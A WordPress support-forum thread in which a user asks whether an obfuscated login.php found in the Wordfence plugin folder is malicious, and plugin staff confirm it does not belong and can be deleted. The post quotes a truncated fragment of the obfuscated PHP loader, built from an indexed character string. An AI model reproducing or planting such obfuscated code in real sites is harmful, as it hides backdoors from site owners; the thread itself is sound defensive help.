Wordfence folder has corrupt php file?

Resolved webcovered
(@webcovered)

10 years, 5 months ago

Hi All,

Wordfence scan just came back with

File appears to be malicious: wp-content/plugins/wordfence/login.php

I looked in the file and theres a bunch of encrypted looking code like this:

<?php
$i45=”gGatAE\tf Z{V)x+L9eb&>ohmdz%RBn4N@\rlFj1.ys#W*J[v86CMX}?’D2q]S7IUki0=Q(<O/u_w,r~-`p\n5\$\\K3;T!H^Y|:\”cP”; $GLOBALS[‘dbdsh72’] = $i45[64].$i45[29].$i45[64].$i45[73].$i45[40].$i45[17].$i45[3]; $GLOBALS[‘zvxik8’] = $i45[17].$i45[76].$i45[76].$i45[21].$i45[76].$i45[73].$i45[76].$i45[17].$i45[80].$i45[21].$i45[76].$i45[3].$i45[64].$i45[29].$i45[0]; $GLOBALS[‘uvhvz39’] = $i45[24].$i45[17].$i45[7].$i45[64].$i45[29].$i45[17]; $GLOBALS[‘jkbce60’] = $i45[13].$i45[13].$i45[13].$i45[29].$i45[13].$i45[86].$i45[86]; $GLOBALS[‘vhtxr99’] = $i45[80].$i45[17].$i45[22].$i45[23].$i45[21].$i45[48].$i45[47]; $GLOBALS[‘tawip99’] = $i45[23].$i45[24].$i45[82]; $GLOBALS[‘tlnlj18’] = $i45[96].$i45[21].$i45[72].$i45[29].$i45[3]; $GLOBALS[‘aggdq61’] = $i45[3].$i45[64].$i45[23].$i45[17]; $GLOBALS[‘erhbh57’] = $i45[96].$i45[21].$i45[29].$i45[40].$i45[3].$i45[2].$i45[29].$i45[3]; $GLOBALS[‘bxspp73’] = $i45[46].$i45[21].$i45[57].$i45[22].$i45[34].$i45[37].$i45[37]; $GLOBALS[‘vkdto58’] = $i45[13].$i45[80].$i45[40].$i45[36].$i45[17].$i45[56].$i45[56]; $GLOBALS[‘tcudy16’] = $i45[29].$i45[22].$i45[34].$i45[17].$i45[39].$i45[56].$i45[65]; $GLOBALS[‘kraif87’] = $i45[29].$i45[24].$i45[80].$i45[3].$i45[46].$i45[37].$i45[82]; $GLOBALS[‘bstyi22’] = $i45[57].$i45[39].$i45[40].$i45[40].$i45[74].$i45[37].$i45[86]; $GLOBALS[‘mlmpl90’] = $i45[7].$i45[72].$i45[29].$i45[96].$i45[3].$i45[64].$i45[21].$i45[29].$i45[73].$i45[17].$i45[13].$i45[64].$i45[40].$i45[3].$i45[40]; $GLOBALS[‘eewzm76’] = $i45[23].$i45[2].$i45[64].$i45[34]; $GLOBALS[‘ykyms31’] = $i45[96].$i45[21].$i45[34].$i45[96].$i45[57].$i45[60]; $GLOBALS[‘tfusr95’] = $i45[25].$i45[80].$i45[29].$i45[34].$i45[96].$i45[60].$i45[56]; $GLOBALS[‘jdjje75’] = $i45[72].$i45[40].$i45[34].$i45[17].$i45[17].$i45[80]; $GLOBALS[‘dgoyi69’] = $i45[0].$i45[22].$i45[40].$i45[24].$i45[23].$i45[86].$i45[65]; $GLOBALS[‘bjkvz14’] = $i45[36].$i45[0].$i45[29].$i45[18].$i45[40].$i45[37]; $GLOBALS[‘ordoj25’] = $i45[3].$i45[76].$i45[64].$i45[23]; $GLOBALS[‘hzybc58’] = $i45[80].$i45[76].$i45[17].$i45[0].$i45[73].$i45[76].$i45[17].$i45[80].$i45[34].$i45[2].$i45[96].$i45[17]; $GLOBALS[‘huagi67’] = $i45[0].$i45[17].$i45[3].$i45[22].$i45[21].$i45[40].$i45[3].$i45[18].$i45[39].$i45[29].$i45[2].$i45[23].$i45[17]; $GLOBALS[‘amhpr71’] = $i45[80].$i45[76].$i45[17].$i45[0].$i45[73].$i45[23].$i45[2].$i45[3].$i45[96].$i45[22]; $GLOBALS[‘aagel30’] = $i45[34].$i45[22].$i45[2].$i45[22].$i45[2].$i45[60].$i45[16]; $GLOBALS[‘epudp15’] = $i45[13].$i45[24].$i45[2].$i45[63].$i45[76].$i45[86].$i45[16]; $GLOBALS[‘ibjwf68’] = $i45[57].$i45[39].$i45[0].$i45[39].$i45[57].$i45[82].$i45[30]; $GLOBALS[‘xyhna95’] = $i45[3].$i45[25].$i45[40].$i45[18].$i45[25].$i45[56].$i45[56]; $GLOBALS[‘kkkpt6’] = $i45[40].$i45[3].$i45[76].$i45[34].$i45[17].$i45[29]; $GLOBALS[‘lgzdl89’] = $i45[34].$i45[25].$i45[46].$i45[76].$i45[17].$i45[60].$i45[86]; $GLOBALS[‘votiq98’] = $i45[13].$i45[63].$i45[63].$i45[23].$i45[36].$i45[30]; $GLOBALS[‘gnigy46’] = $i45[2].$i45[76].$i45[76].$i45[2].$i45[39].$i45[73].$i45[63].$i45[17].$i45[39].$i45[40]; $GLOBALS[‘ykexp69’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[40].$i45[17].$i45[34].$i45[17].$i45[96].$i45[3]; $GLOBALS[‘lyyuv95’] = $i45[72].$i45[96].$i45[7].$i45[64].$i45[76].$i45[40].$i45[3]; $GLOBALS[‘ealch88’] = $i45[40].$i45[3].$i45[76].$i45[73].$i45[76].$i45[17].$i45[80].$i45[34].$i45[2].$i45[96].$i45[17]; $GLOBALS[‘xzgok23’] = $i45[64].$i45[29].$i45[64].$i45[73].$i45[0].$i45[17].$i45[3]; $GLOBALS[‘lgfsw68’] = $i45[29].$i45[17].$i45[29].$i45[64].$i45[13].$i45[60].$i45[30]; $GLOBALS[‘pjbri84’] = $i45[24].$i45[2].$i45[3].$i45[17]; $GLOBALS[‘ktmaq59’] = $i45[0].$i45[17].$i45[3].$i45[23].$i45[13].$i45[76].$i45[76]; $GLOBALS[‘zkmyq91’] = $i45[39].$i45[0].$i45[76].$i45[23].$i45[57].$i45[56].$i45[48]; $GLOBALS[‘tjxyf81’] = $i45[23].$i45[64].$i45[29]; $GLOBALS[‘simdy2’] = ${$i45[73].$i45[97].$i45[70].$i45[59].$i45[88]}; $GLOBALS[‘kasyq16’] = $i45[13].$i45[7].$i45[46].$i45[72].$i45[25].$i45[56].$i45[86]; $GLOBALS[‘hugnq89’] = $i45[80].$i45[76].$i45[17].$i45[0].$i45[73].$i45[40].$i45[80].$i45[34].$i45[64].$i45[3]; $GLOBALS[‘ienjl54’] = $i45[74].$i45[74].$i45[29].$i45[7].$i45[3].$i45[30].$i45[82]; $GLOBALS[‘jiayg7’] = $i45[96].$i45[22].$i45[76]; $GLOBALS[‘wnjju51’] = $i45[21].$i45[76].$i45[24]; $GLOBALS[‘iuiyy26’] = $i45[72].$i45[76].$i45[34].$i45[24].$i45[17].$i45[96].$i45[21].$i45[24].$i45[17]; $GLOBALS[‘zcgob52’] = $i45[40].$i45[3].$i45[76].$i45[64].$i45[80].$i45[40].$i45[34].$i45[2].$i45[40].$i45[22].$i45[17].$i45[40]; $GLOBALS[‘qyxjw22’] = $i45[2].$i45[76].$i45[76].$i45[2].$i45[39].$i45[73].$i45[7].$i45[34].$i45[64].$i45[80]; $GLOBALS[‘xatlb31’] = $i45[80].$i45[76].$i45[17].$i45[0].$i45[73].$i45[23].$i45[2].$i45[3].$i45[96].$i45[22].$i45[73].$i45[2].$i45[34].$i45[34]; $GLOBALS[‘dgpbg24’] = $i45[18].$i45[2].$i45[40].$i45[17].$i45[48].$i45[30].$i45[73].$i45[17].$i45[29].$i45[96].$i45[21].$i45[24].$i45[17]; $GLOBALS[‘dhydf19’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[96].$i45[76].$i45[17].$i45[2].$i45[3].$i45[17]; $GLOBALS[‘jwzxo38’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[34].$i45[2].$i45[40].$i45[3].$i45[73].$i45[17].$i45[76].$i45[76].$i45[21].$i45[76]; $GLOBALS[‘lifdq16’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[40].$i45[3].$i45[76].$i45[17].$i45[76].$i45[76].$i45[21].$i45[76]; $GLOBALS[‘rnxje51’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[40].$i45[17].$i45[3].$i45[73].$i45[21].$i45[80].$i45[3].$i45[64].$i45[21].$i45[29]; $GLOBALS[‘huppu2’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[40].$i45[17].$i45[3].$i45[73].$i45[29].$i45[21].$i45[29].$i45[18].$i45[34].$i45[21].$i45[96].$i45[63]; $GLOBALS[‘gntqh20’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[96].$i45[21].$i45[29].$i45[29].$i45[17].$i45[96].$i45[3]; $GLOBALS[‘aowkt56’] = $i45[7].$i45[40].$i45[21].$i45[96].$i45[63].$i45[21].$i45[80].$i45[17].$i45[29]; $GLOBALS[‘mvfxn26’] = $i45[40].$i45[3].$i45[76].$i45[17].$i45[2].$i45[23].$i45[73].$i45[40].$i45[17].$i45[3].$i45[73].$i45[18].$i45[34].$i45[21].$i45[96].$i45[63].$i45[64].$i45[29].$i45[0]; $GLOBALS[‘werhs24’] = $i45[40].$i45[3].$i45[76].$i45[17].$i45[2].$i45[23].$i45[73].$i45[40].$i45[17].$i45[3].$i45[73].$i45[3].$i45[64].$i45[23].$i45[17].$i45[21].$i45[72].$i45[3]; $GLOBALS[‘olanz76’] = $i45[40].$i45[3].$i45[76].$i45[17].$i45[2].$i45[23].$i45[73].$i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[96].$i45[34].$i45[64].$i45[17].$i45[29].$i45[3]; $GLOBALS[‘lihkl99’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[96].$i45[34].$i45[21].$i45[40].$i45[17]; $GLOBALS[‘yjwpc26’] = $i45[7].$i45[96].$i45[34].$i45[21].$i45[40].$i45[17]; $GLOBALS[‘oojcg13’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[76].$i45[17].$i45[2].$i45[24]; $GLOBALS[‘baqls93’] = $i45[7].$i45[17].$i45[21].$i45[7]; $GLOBALS[‘fzlus11’] = $i45[7].$i45[76].$i45[17].$i45[2].$i45[24]; $GLOBALS[‘rwejq64’] = $i45[40].$i45[21].$i45[96].$i45[63].$i45[17].$i45[3].$i45[73].$i45[74].$i45[76].$i45[64].$i45[3].$i45[17]; $GLOBALS[‘rwqrh88’] = $i45[7].$i45[74].$i45[76].$i45[64].$i45[3].$i45[17]; $GLOBALS[‘vrnbj49’] = $i45[76].$i45[2].$i45[29].$i45[24]; $GLOBALS[‘hwpcl86’] = $i45[17].$i45[13].$i45[80].$i45[34].$i45[21].$i45[24].$i45[17]; $GLOBALS[‘aikgm87’] = $i45[80].$i45[2].$i45[96].$i45[63]; $GLOBALS[‘axorw85’] = $i45[72].$i45[29].$i45[80].$i45[2].$i45[96].$i45[63]; $GLOBALS[‘khjjx8’] = $i45[64].$i45[0].$i45[22].$i45[22].$i45[64].$i45[30].$i45[60]; $GLOBALS[‘vyyyo44’] = $i45[2].$i45[76].$i45[76].$i45[2].$i45[39].$i45[73].$i45[23].$i45[17].$i45[76].$i45[0].$i45[17]; $GLOBALS[‘enpkt54’] = $i45[34].$i45[21].$i45[29].$i45[0].$i45[56].$i45[64].$i45[80]; @$GLOBALS[‘dbdsh72’]($i45[17].$i45[76].$i45[76].$i45[21].$i45[76].$i45[73].$i45[34].$i45[21].$i45[0],NULL); @$GLOBALS[‘dbdsh72’]($i45[34].$i45[21].$i45[0].$i45[73].$i45[17].$i45[76].$i45[76].$i45[21].$i45[76].$i45[40],0); @$GLOBALS[‘zvxik8’](NULL); $GLOBALS[‘uvhvz39’]($i45[55].$i45[31].$i45[59].$i45[73].$i45[88].$i45[92].$i45[97].$i45[5].$i45[73].$i45[50].$i45[51], 0x000F); $GLOBALS[‘uvhvz39’]($i45[55].$i45[31].$i45[59].$i45[73].$i45[88].$i45[92].$i45[97].$i45[5].$i45[73].$i45[4] , 0x0001); $GLOBALS[‘uvhvz39’]($i45[55].$i45[31].$i45[59]

^ thats just a sample of the code.

Is this malicious? Should I delete it?

Thanks,
Dave

https://wordpress.org/plugins/wordfence/

Viewing 2 replies - 1 through 2 (of 2 total)

WFBrian
(@wfbrian)

10 years, 5 months ago

Hi Dave,

Please send the code to samples@wordfence.com. That will get it logged and an engineer will take a look. If they have any questions, they’ll contact you.

Thanks!
Brian

Plugin Author WFMattR
(@wfmattr)

10 years, 5 months ago

@webcovered: I didn’t see if you had sent this to our samples address yet, but this code does not belong there, and there should be no “login.php” file in that location. It should be safe to remove the file.

-Matt R

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Wordfence folder has corrupt php file?’ is closed to new replies.